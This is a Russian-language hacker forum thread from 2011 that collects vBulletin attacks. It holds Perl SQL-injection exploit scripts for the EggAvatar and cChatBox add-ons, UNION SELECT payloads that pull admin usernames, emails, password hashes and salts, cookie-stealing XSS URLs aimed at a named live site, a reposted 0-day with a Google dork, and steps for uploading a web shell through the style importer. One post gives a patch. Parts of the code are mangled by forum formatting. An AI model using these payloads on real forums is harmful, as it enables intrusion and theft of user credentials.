 |
|
07.03.2011, 13:41
|
|
Новичок
Регистрация: 12.12.2010
Сообщений: 0
С нами:
8114006
Репутация:
0
|
|
EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability
[PHP]
[COLOR="#000000"]#!/usr/bin/env perl
useLWP::UserAgent;
sub banner{
print"###################################\n";
print"############ DSecurity ############\n";
print"###################################\n";
print"# Email:dsecurity.vn[at]gmail.com #\n";
print"###################################\n";
}
if(@ARGVnew();
$ua->agent("DSecurity");
$ua->cookie_jar({});
sub login(@){
my $username=shift;
my $password=shift;
my $req=HTTP::Request->new(POST=>$ARGV[0].'/login.php?do=login');
$req->content_type('application/x-www-form-urlencoded');
$req->content("vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login& vb_login_md5password=&vb_login_md5password_utf=");
my $res=$ua->request($req);
}
sub v_request{
#Declare
$print=$_[0];
$select=$_[1];
$from=$_[2];
$where=$_[3];
$limit=$_[4];
$sleep=$ARGV[4];
if ($from eq'') {$from='information_schema.tables';}
if ($where eq'') {$where='1';}
if ($limit eq'') {$limit='0';}
if ($sleep eq'') {$sleep='10';}
# Create a request
my $req=HTTP::Request->new(POST=>$ARGV[0].'/eggavatar.php');
$req->content_type('application/x-www-form-urlencoded');
$req->content('do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar =1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT( (select$selectfrom$fromWHERE$wherelimit$limit,1),FLOOR(RAND(1)*3))foo FROM information_schema .tables GROUP BY foo)a)-- -'&uid=1&pid=1");
# Pass request to the user agent and get a response back
my $res=$ua->request($req);
#print $res->content;
if($res->content=~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)
{$test= $3};
sleep($sleep);
return$print.$test."\n";
}
&banner;
print"\n############################################### ################################################## ############\n";
print"# EggAvatar for vBulletin 3.8.x SQL Injecti on Vulnerability #\n";
print"# Date:06-03-2011 #\n";
print"# Author: DSecurity #\n";
print"# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n";
print"# Version: 2.3.2 #\n";
print"# Tested on: vBulletin 3.8.0 #\n";
print"################################################# ################################################## ##########\n";
#login
login($ARGV[1],$ARGV[2]);
#Foot print
printv_request('MySQL version: ','@@version');
printv_request('Data dir: ','@@datadir');
printv_request('User: ','user()');
printv_request('Database: ','database()');
#Get user
for($i=1;$i[COLOR="#007700"]
|
|
|
24.03.2011, 19:21
|
|
Новичок
Регистрация: 05.03.2011
Сообщений: 0
С нами:
7994486
Репутация:
0
|
|
Баг с хайдом
_ttp://ru-ua.ws/showthread.php?p=13674
Юзать:
http://site.ru/showthread.php?p=1&highlight=[HIDE
Фикс:
1. Открыть файл /includes/vS_HHR_Engine.php
2. После
[PHP]
[COLOR="#000000"][COLOR="#007700"]
|
|
|
|
19.04.2011, 13:21
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами:
10248806
Репутация:
2371
|
|
[QUOTE="DotNet"]
Баг с хайдом
_ttp://ru-ua.ws/showthread.php?p=13674
Юзать:
http://site.ru/showthread.php?p=1&highlight=[HIDE
Фикс:
1. Открыть файл /includes/vS_HHR_Engine.php
2. После
[PHP]
[COLOR="#000000"][COLOR="#007700"]
|
|
|
|
05.05.2011, 12:45
|
|
Участник форума
Регистрация: 19.12.2010
Сообщений: 155
С нами:
8103926
Репутация:
85
|
|
Активная XSS в модуле vBH New Tabs Options
vBH New Tabs Options - возможность вставки произвольного js кода на все страницы vBulletin 4.x.x
Уязвимость существует из-за отсутствия фильтрации при добавлении новых вкладок в главное навигационное меню, через указанный модуль.
Эксплойт, в поле со списком вкладок добавляем:
Сообщение от None
alert(/xss/)|1.php
Автор: eclipse
Примечание:
Чтобы заюзать уязвимость нужно обладать доступом в AdminCP.
|
|
|
|
08.05.2011, 16:54
|
|
Новичок
Регистрация: 25.01.2010
Сообщений: 2
С нами:
8574898
Репутация:
0
|
|
Vbulletin 4.0.2
Уязвимость: XSS.
Код:
================================= Vbulletin 4.0.2 XSS Vulnerability ================================= [+] Vbulletin 4.0.2 XSS Vulnerability 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ###################################### 1 0 I'm 5ubzer0 member from Inj3ct0r Team 1 1 ###################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] Discovered By: 5ubzer0 [+] My id : http://inj3ct0r.com/author/2307 [+] Original : http://inj3ct0r.com/exploits/9697 # Version: Vbulletin 4.0.2 www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=">alert('xss'); www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=">alert(document.cookie); Exemple: http://www.forumjogosonline.com.br/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Cscript%3Ealert(document.cookie);%3C /script%3E
|
|
|
|
23.05.2011, 23:25
|
|
Новичок
Регистрация: 20.12.2010
Сообщений: 1
С нами:
8102486
Репутация:
0
|
|
Работает на 4.0.x - 4.1.2, в 4.1.3 - пропатчено.
http://www.youtube.com/watch?v=fR9RGCqIPkc
Нужен аддон для ФФ4 - Live HTTP Headers - http://psp-mode.yolasite.com/resources/liveHTTPheadersFF4.xpi
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]cat[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]UNION SELECT database[/COLOR][COLOR="#007700"]()[/COLOR][COLOR="#FF8000"]#
[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]cat[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]UNION SELECT table_name FROM information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tables[/COLOR][COLOR="#FF8000"]#
[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]cat[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]UNION SELECT concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]email[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]password[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]salt[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]FROM user WHERE userid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#FF8000"]#
[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"])
[/COLOR][/COLOR]
|
|
|
|
22.06.2011, 04:30
|
|
Познающий
Регистрация: 10.09.2009
Сообщений: 40
С нами:
8772921
Репутация:
1
|
|
/vb/search/searchtools.php
Код:
$id = $vbulletin->db->sql_prepare($id);
if (is_array($id))
{
Код:
function sql_prepare($value)
{
if (is_string($value))
{
return "'" . $this->escape_string($value) . "'";
}
else if (is_numeric($value) AND $value + 0 == $value)
{
return $value;
}
else if (is_bool($value))
{
return $value ? 1 : 0;
}
else
{
return "'" . $this->escape_string($value) . "'";
}
}
Меняем на это
Код:
function sql_prepare($value)
{
if (is_string($value))
{
return "'" . $this->escape_string($value) . "'";
}
else if (is_numeric($value) AND $value + 0 == $value)
{
return $value;
}
else if (is_bool($value))
{
return $value ? 1 : 0;
}
else if (is_null($value))
{
return "''";
}
else if (is_array($value))
{
foreach ($value as $key => $item)
{
$value[$key] = $this->sql_prepare($item);
}
return $value;
}
else
{
return "'" . $this->escape_string($value) . "'";
}
}
удачи! |
|
|
|
22.07.2011, 12:29
|
|
Познающий
Регистрация: 02.05.2011
Сообщений: 48
С нами:
7910966
Репутация:
1
|
|
Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
Код:
# Google Dork: intitle: powered by Vbulletin 4
# Date: 20/07/2011
# Author: FB1H2S
# Software Link: [http://www.vbulletin.com/]
# Version: [4.x.x]
# Tested on: [relevant os]
# CVE : [http://members.vbulletin.com/]
######################################################################################################
Vulnerability:
######################################################################################################
Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter "&messagegroupid" due to improper input validation.
#####################################################################################################
Vulnerable Code:
#####################################################################################################
File: /vbforum/search/type/socialgroupmessage.php
Line No: 388
Paramater : messagegroupid
if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0)
{
$value = $registry->GPC['messagegroupid'];
if (!is_array($value))
{
$value = array($value);
}
if (!(in_array(' ',$value) OR in_array('',$value)))
{
if ($rst = $vbulletin->db->query_read("
SELECT socialgroup.name
FROM " . TABLE_PREFIX."socialgroup AS socialgroup
---> WHERE socialgroup.groupid IN (" . implode(', ', $value) .")")
}
############################################################################################
Exploitation:
############################################################################################
Post data on: -->search.php?search_type=1
--> Search Single Content Type
Keywords : Valid Group Message
Search Type : Group Messages
Search in Group : Valid Group Id
&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
##########################################################################################
More Details:
##########################################################################################
Http://www.Garage4Hackers.com
http://www.garage4hackers.com/showthread.php?1177-Vbulletin-4.0.x-gt-4.1.3-(messagegroupid)-SQL-injection-Vulnerability-0-day
###########################################################################################
Note:
###########################################################################################
Funny part was that, a similar bug was found in the same module, search query two months back. Any way Vbulletin has released a patch as it was reported to them by altex, hence
customers are safe except those lowsy Admins. And this bug is for people to play with the many Nulled VB sites out there. " Say No to Piracy Disclosure ".
|
|
|
|
08.08.2011, 22:21
|
|
Новичок
Регистрация: 19.05.2011
Сообщений: 26
С нами:
7886486
Репутация:
-1
|
|
cChatBox for vBulletin 3.6.8 and 3.7.x SQL Injection Vulnerability
Код:
#!/usr/bin/perl
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
$ua->agent("MyApp/0.1 ");
print "##################################\n";
print "############ EXPLOIT #############\n";
print "##################################\n";
print "## Portal: cchatbox ##\n";
print "## Bug: SQLI ##\n";
print "## Author: DSecurity ##\n";
print "## Coder: vv0lll ##\n";
print "##################################\n";
print "Use: exploit.pl address number_user sleeptime\n";
print "Example: exploit.pl http://localhost/vbb 10 10\n";
if(@ARGV new(POST => $ARGV[0].'/cchatbox.php');
$req->content_type('application/x-www-form-urlencoded');
$req->content('do=edit&messageid=0 and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select '.$select.' from '.$from.' WHERE '.$where.' limit '.$limit.',1),FLOOR(RAND(1)*3))x FROM information_schema.tables GROUP BY x)a)');
# Pass request to the user agent and get a response back
my $res = $ua->request($req);
#print $res->content;
if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)
{$test = $3};
sleep($sleep);
return $print.$test."\n";
}
|
|
|
|
17.08.2011, 22:51
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от Cherep
можно ли залить шелл, не имея прав на файл plugins.php(файл через который добавляют модули), и не имея возможности залить запихать смайлы?
Цитирую 525:
Сообщение от None
Заливка шелла в vBulletin.
1.AdminCP>Styles & Templates>Download / Upload Styles
2.Вибираєм наш шелл в .xml , Ignore Style Version - YES > Import
3.Обратно к Style Manager кликаем по загруженном файлу и видим наш шелл
шелл :
http://pastebin.com/ybZqXiDH
Источник:http://insecurity.ro/blog/shelling-vbulletin-4-0-x-3-8-x-xml/
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
